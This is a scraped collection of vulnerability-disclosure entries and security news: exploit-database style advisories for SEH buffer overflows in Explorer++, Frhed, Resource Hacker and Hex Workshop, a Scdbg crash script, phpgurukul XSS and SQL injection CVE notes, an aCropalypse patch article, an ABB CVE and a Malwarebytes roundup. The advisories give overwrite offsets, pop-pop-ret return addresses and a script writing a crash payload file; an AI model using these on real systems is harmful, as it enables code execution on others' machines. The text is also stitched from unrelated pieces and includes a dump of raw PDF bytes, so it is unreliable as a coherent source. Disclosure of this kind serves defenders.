Explorer32++ version 1.3.5.531 suffers from a buffer overflow vulnerability.

    # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://www.explorerplusplus.com/# Software Link : http://www.explorerplusplus.com/# Tested Version: 1.3.5.531# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Explorer++ 1.3.5.531, and possibly other versions, may allow attackersto execute arbitrary code via a long file name argument.Proof of concept:Open Explorer32++.exe from command line with a large string in Arguments,more than 396 chars:File '<Explorer++_PATH>\Explorer32++.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FB14   0069004100370069   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten withunicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclicdata after the handler

Explorer32++ 1.3.5.531 Buffer Overflow

Frhed version 1.6.0 suffers from a buffer overflow vulnerability.

    # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://frhed.sourceforge.net/# Software Link : http://frhed.sourceforge.net/# Tested Version: 1.6.0# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Frhed (Free hex editor) v1.6.0, and possibly other versions, may allowattackers to execute arbitrary code via a long file name argument.Proof of concept:Open Frhed.exe from command line with a large string in Arguments, morethan 494 chars:File '<Frhed_PATH>\Frhed.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FC8C   4136714135714134   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten withnormal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclicdata after the handler0BADF00D   ------------------------------                       'Targets'        =>                           [                               [ '<fill in the OS/app version here>',                                   {                                       'Ret'         =>    0x00401ba7, #pop ecx # pop ecx # ret    - Frhed.exe (change this value by other without\x00)                                       'Offset'    =>    494                                   }                               ],                           ],

Frhed 1.6.0 Buffer Overflow

Resource Hacker version 3.6.0.92 suffers from a buffer overflow vulnerability.

    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.angusj.com/resourcehacker/# Software Link : http://www.angusj.com/resourcehacker/# Tested Version: 3.6.0.92# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Heap-based buffer overflow controlling the Structured Exception Handler(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,may allow attackers to execute arbitrary code via a long file name argument.Proof of concept:Open ResHacker.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\ResourceHacker36\ResHacker.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'SEH chain of main threadAddress    SE handler0018FCB4   316A41306A413969   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fcb4 overwritten withnormal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclicdata after the handler0BADF00D   ------------------------------'Targets'        =>[[ '<fill in the OS/app version here>',{                                       'Ret'         =>    0x00426446, #pop eax # pop ebx # ret    - ResHacker.exe (change this value from Mona,with a not \x00 ret address)                                       'Offset'    =>    268}],],

Resource Hacker 3.6.0.92 Buffer Overflow

Hex Workshop version 6.7 is vulnerable to denial of service via command line file arguments and control of the Structured Exception Handler (SEH) records.

    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com# Tested Version: v6.7# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Hex Workshop v6.7 is vulnerable to denial of service via a command linefile arguments and control the Structured Exception Handler (SEH) records.Proof of concept:Open HWorks32.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\Hex Workshop\HWorks32.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten withunicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclicdata after the handlerThe application crash.

Hex Workshop 6.7 Buffer Overflow / Denial Of Service

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Admin Name parameter.

_\# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability.  
\# Date: 25–01–2023  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:_ _https://phpgurukul.com/__\# Software Link:_ _https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/__\# Vulnerable Parameter : Admin Name  
\# Version: 1.0  
\# Tested on: Windows 10  
\# Contact:_ _https://www.linkedin.com/in/shivakumar-m-v/_

XSS is an attack technique that injects malicious code into vulnerable web applications. Unlike other attacks, this technique does not target the web server itself, but the user’s browser.

Stored XSS is a type of XSS that stores malicious code on the application server. Using stored XSS is only possible if your application is designed to store user input.

The Reproducive Steps are given in Video PoC.

Remediation :

01) Use Web Application Firewall.

02) Input validation.

CVE-2023-26958: Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.

> \# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — SQL Injection Vulnreability.  
> \# Date: 25–01–2023  
> \# Exploit Author: Venkata Siva Kumar Medituru  
> \# Vendor Homepage: https://phpgurukul.com/  
> \# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/  
> \# Vulnerable Parameter : User Name  
> \# Version: 1.0  
> \# Tested on: Windows 10  
> \# Contact: https://www.linkedin.com/in/shivakumar-m-v/

SQL injection is a technique used to exploit the Authentication pages and intruder can penetrate into dashboard without any valid credentials. The perpetrator may enumerate User name, personal information, App functionality and in other words complete account take over is possible.

The reproducive steps are given in vidoe PoC.

> **Mitigations**

01) Configure Web Application Firewall to understand various SQL payloads and to ignore / drop the malicious requests crafted by perpetrator

02) Implement input validations and parametrized queries including prepared statements.

03) Limit the verbose error messages in the responses so that attacker not able to figure out the way to bypass the implemented controls.

CVE-2023-26959: Authentication Bypass — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11.
The issue, dubbed aCropalypse, could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out.
Tracked as CVE-2023-28303, the vulnerability is rated 3.3 on the CVSS

Privacy / Windows Security

Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11.

The issue, dubbed **aCropalypse**, could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out.

Tracked as **CVE-2023-28303**, the vulnerability is rated 3.3 on the CVSS scoring system. It affects both the Snip & Sketch app on Windows 10 and the Snipping Tool on Windows 11.

"The severity of this vulnerability is Low because successful exploitation requires uncommon user interaction and several factors outside of an attacker's control," Microsoft said in an advisory released on March 24, 2023.

Successful exploitation requires that the following two prerequisites are met -

*   The user must take a screenshot, save it to a file, modify the file (for example, crop it), and then save the modified file to the same location.
*   The user must open an image in Snipping Tool, modify the file (for example, crop it), and then save the modified file to the same location.

However, it does not impact scenarios where an image is copied from the Snipping Tool or modified before saving it.

"If you take a screenshot of your bank statement, save it to your desktop, and crop out your account number before saving it to the same location, the cropped image could still contain your account number in a hidden format that could be recovered by someone who has access to the complete image file," Microsoft explains.

"However, if you copy the cropped image from Snipping Tool and paste it into an email or a document, the hidden data will not be copied, and your account number will be safe."

The vulnerability has been addressed in-app version 10.2008.3001.0 of Snip and Sketch installed on Windows 10 and version 11.2302.20.0 of Snipping Tool installed on Windows 11.

aCropalypse first came to light on March 18, 2022, when it was found that a bug in Google Pixel's Markup tool made it possible to retroactively reverse the changes introduced to screenshots, thereby recovering personal information from redacted screenshots and images, including those that have been cropped or had their contents masked.

Credited with discovering the problem are reverse engineers Simon Aarons and David Buchanan.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The Pixel-related high-severity flaw, tracked as CVE-2023-21036, was reported to Google on January 2, 2023, and was fixed via an update released on March 6, 2023 for Pixel 4A, 5A, 7, and 7 Pro devices.

The shortcoming has existed since the release of the Markup utility with Android 9 Pie in 2018, and images already shared over the past five years are vulnerable to the Acropalypse attack, raising possible privacy concerns.

"You can patch it, but you can't easily un-share all the vulnerable images you may have sent," Buchanan said in a tweet, describing it as a "bad one."

A similar issue with reversible cropping was recently disclosed in Google Docs as well, allowing users with view-only access to recover original versions of cropped images in shared documents without having the edit permissions to do so.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patch for aCropalypse Privacy Flaw in Windows Screenshot Tools

Use of Default Password vulnerability in ABB RCCMD on Windows, Linux, MacOS allows Try Common or Default Usernames and Passwords.This issue affects RCCMD: before 4.40 230207.

%PDF-1.7 %���� 1 0 obj <>/Metadata 473 0 R/ViewerPreferences 474 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 842.04\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\[Ko�����n6���F��$X����=(^���J����S���n�D�8���zW}UMo�o�/�?~:t77��px��ϧߺ�ۇ���n���i����/Ϗ�//�����������oO�������������\]\_q-��Ri�i��2�}{��������+����#��)�;��6�v�����ھ:<�n���\_2ra�֊�n��5������'���~��2�H'ҒwK@ w�B ܽ���x�����\` W����-��1���"�J؇pO��)\\�;��\`n�\]�R�~cp�=Ƣ��{����0�˛��s! ��̅�����x��N �mr ����B�$�a�������3\*\`��++�b��X\[i�(88��u��L��ʜpE��p�A���7ފ�����e�Di���ycSYj}�ikeW�͑�5e@�i嵲!&��Kp m�l�u9�hhaLPY�\[� O���ƍ�M$\[�"}��>E����+H��T �J\`���>y�ru�Z�1pK�B�nw�^"޾/�Q����!����#�TR9%�B++�-lf�3�q���(x������W�)�O���Gԁ��\]��Ŷ�-.�����ĩ@�V��\[b�\*���Ed�J�d�u�8"�\_�a����}0\_�� o2�កeӈ=��r ��How�,=����}�{n��XRR������\*W�fR�"�\*vD���ڎ%(���XR�OP!\\���;Yـ���\[J������8p�P�:.������\_��0��'C+%1ߊ� RUE����le{��˾çU M\`Ac���\`�Hu��s��o��̼fNy�gc�����i:�4xo��"stm! F\\� �ʇ�m�+(�0�:���+���m�.P��DFхv�0�ܙ~L|�� ��QM�Q�я�Hj/)+�j��'�\]ڭ�5=)\*3�a��M^S$iCU���W�?�.\[TWTLy�������N�a�U��U��dQ@�;y���4�6�-��z-@VM)���!Ig�CV��+��z�n�ޓ�a�}4�ĵ-,>"���{���m�Ǵ�҅H�ew��-�CA�ƈ< � ���.�>���b�t�B@���L'�q�e�#��թ+f�-�g�?�5��ߢ���=�ɭQ��#J�����\`My)��{6&}��T��Ɲ�7����Բ9C�1D)Cd�eƇY�{���\[��\]K���y���j��E#�Cg���V�"C�z�B!�j�� �f#u��(�#~�aX��>|}|y%۟�?w?<=o���x�b�8�6���/� �46H��(�v�RѠv�0��S���f\[������qlnmI�I�<�Q���׮���YQO��5vE���@ ,�FV,�z�G��S���ɠB�,"a�ɼk�Jg;�p�����/�c7?��r�QDb�p��&��^D�rq� �@���0>�5 άs��>�e1��9��d��N)��3O�I�D<�ǁ��-"3�>a-Pu��j�#Qs:q��遤��X��)� |��3!�W��h��dت�y�9�8�M�\[�)n��y���"��ۉ�5-��S\_=�\`�D�w��壎F\]y��� �Tf�C8��NK�x\_ �+\]9Ƣ�^!j�wb��6��"�4��c,M�K,x+c��\`t��4�gQ��ct�E\*��0,LQU�fY�-\*�rNM��T �l=������,aB�٘�5ܙR��%���!E�T�|&�0D�Ɵm�21�}�ig��}�Jw�D��t��w�c�>Kzr��x�����d������r�$�S\*ɒ��p�V��|G ��󊘛�zxVx�����ɼ���ؒ��2!Y)$�á)�(;�1� 7�x�-Z�Sc0q�X�U����V�@�#��m�)8����Sŉ�mĘ�}Y˦���������e\*�h\*-+�x�\*JM/�)\_R�$<���k#KpN#��h�j�T�a��=)\`a�!���2Q�����Q��ID+s�\\\*�c�����x�9�kUi�jr$��\\29Wa� �mXv7�IY �� �z�m5��@�8�,�@8��R���%S<;sym����3�0�uY��V���7�ѻ���)� :ϥn�F�Ƭ;B���(䜻�Ɩ��кF:Z�StƧ�ű�Xm��$E�5gy�$�+b���${�x��z�Iռe/c8�/Dh��ژ��#ӛ���!n�����\*�c�2p�}ke�W��1$�w5����.����� >\_?��"��a!�@ m%�)�������ɤ6YT��X S�?0�RE'����Ck\\��

CVE-2022-4126

Categories: News
Tags: potentially unwanted programs

Tags:  PUP

Tags:  ViLE

Tags:  Google

Tags:  Magecart

Tags:  skimmer

Tags:  skimming

Tags:  NBA

Tags:  Google Pixel crop

Tags:  Kritec Magecart

Tags:  fake IRS tax mail

Tags:  Emotet

Tags:  BreachForums

Tags:  Bitcoin ATM

Tags:  Bitcoin

Tags:  USB bomb

Tags:  USB

Tags:  ChatGPT

The most interesting security related news from the week of March 20 - 26.



(Read more...)




The post A week in security (March 20 - 26) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

Tag

#windows